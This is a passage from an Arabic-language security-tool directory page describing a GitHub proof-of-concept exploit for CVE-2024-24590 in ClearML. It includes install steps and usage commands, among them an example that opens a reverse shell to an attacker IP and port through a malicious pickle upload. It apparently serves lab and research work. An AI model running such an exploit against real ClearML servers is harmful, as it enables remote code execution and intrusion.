Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-24590-ClearML-RCE-CMD-POC — CVE-2024-24590 ClearML RCE&CMD POC | Kitploit
أدوات/GitHubGitHub/diegogarciayala/cve-2024-24590-clearml-rce-cmd-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالالقيادة والسيطرةأمن سلسلة التوريدأداة الوصول عن بعد
GitHubdiegogarciayala/cve-2024-24590-clearml-rce-cmd-poc

CVE-2024-24590-ClearML-RCE-CMD-POC

CVE-2024-24590 ClearML RCE&CMD POC

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
913منذ 2 سنواتلم تتم المراجعة بعد
مشاركة

سكربت استغلال ClearML

يحتوي هذا المستودع على سكربت استغلال بلغة بايثون لـ CVE-2024-24590. تم تصميم السكربت لرفع ملف pickle خبيث إلى ClearML، والذي ينفذ شل عكسية أو أمر مخصص.

الميزات

  • يرفع قطعة أثرية pickle خبيثة إلى ClearML.
  • ينفذ شل عكسية أو أمر مخصص على الجهاز الهدف.
  • يدعم أسماء مشاريع ومهام مخصصة.
  • يسمح بتعيين علامة على المهمة.

الاستخدام

المتطلبات الأساسية

  • Python 3.x
  • ClearML SDK
  • argparse (عادةً ما يكون مضمنًا مع بايثون)

التثبيت

  1. استنساخ المستودع:

    root@kitploit:~
    git clone https://github.com/diegogarciayala/CVE-2024-24590-ClearML-RCE-CMD-POC.git
    cd CVE-2024-24590-ClearML-RCE-CMD-POC
    
  2. تثبيت ClearML SDK:

    root@kitploit:~
    pip install clearml
    clearml-init
    

تشغيل السكربت

يدعم السكربت وضعين للتشغيل: default و cmd.

الوضع الافتراضي

في هذا الوضع، يجب عليك تقديم عنوان IP ومنفذ المهاجم لإنشاء شل عكسية.

root@kitploit:~
python3 exploit.py default <project_name> <task_name> <attacker_ip> <attacker_port>

وضع CMD

في هذا الوضع، يمكنك تقديم أمر مخصص ليتم تنفيذه.

root@kitploit:~
python3 exploit.py cmd <project_name> <task_name> --cmd "<your_command>"

أمثلة

root@kitploit:~
python3 exploit.py default "Black Swan" "pwned4" "10.10.14.10" "1234"
root@kitploit:~
python3 exploit.py cmd "Black Swan" "pwned4" --cmd "touch /tmp/shell.sh"

من أنا

  • HackTheBox: sl4sh1t0
  • Telegram: sl4sh1t0
  • X (Twitter): @diegogarciayala

الاعتمادات

https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

تنزيل الأداة